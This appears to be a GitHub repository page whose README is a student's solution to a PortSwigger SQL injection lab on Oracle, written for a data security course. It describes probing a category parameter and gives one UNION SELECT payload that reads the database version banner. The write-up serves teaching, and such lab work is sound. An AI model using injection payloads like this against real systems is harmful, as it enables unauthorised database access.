https://github.com/kiarashvosough1999/web-security-academy-sql-injection-attack-querying-the-database-type-and-version-on-oracle
Last synced: 7 months ago
JSON representation
- Host: GitHub
- URL: https://github.com/kiarashvosough1999/web-security-academy-sql-injection-attack-querying-the-database-type-and-version-on-oracle
- Owner: kiarashvosough1999
- Created: 2023-05-28T12:03:55.000Z (over 2 years ago)
- Default Branch: master
- Last Pushed: 2023-05-28T12:54:07.000Z (over 2 years ago)
- Last Synced: 2025-01-29T13:45:40.526Z (9 months ago)
- Size: 2.53 MB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# web-security-academy-sql-injection-attack-querying-the-database-type-and-version-on-oracle
This repository is solution to assignment on Data Security Course. It is a portswigger [Lab](https://portswigger.net/web-security/sql-injection/examining-the-database/lab-querying-database-version-oracle) which was assigned to me to solve.
# Description
This lab contains a SQL injection vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.
To solve the lab, display the database version string.
# Solution
First we navigate go to page 'Gifts' page and observe the paramtere sent by http resquest. as we can see i hast category parameter
now we use single quote to see if server send internal error or not.
No we can obserev the request on proxy, as we wantto send several request, we send it to repeater.
So we add and SQL command to our category parameter to observe the vulnerability and the table has 2 columns
Do it with 3 columns.
No let's get database version. We add `'+UNION+SELECT+banner,+NULL+from+v$version-- ` to be performed on database as the helper on site's cheat sheet mentioned
# Result
Lab is solved.
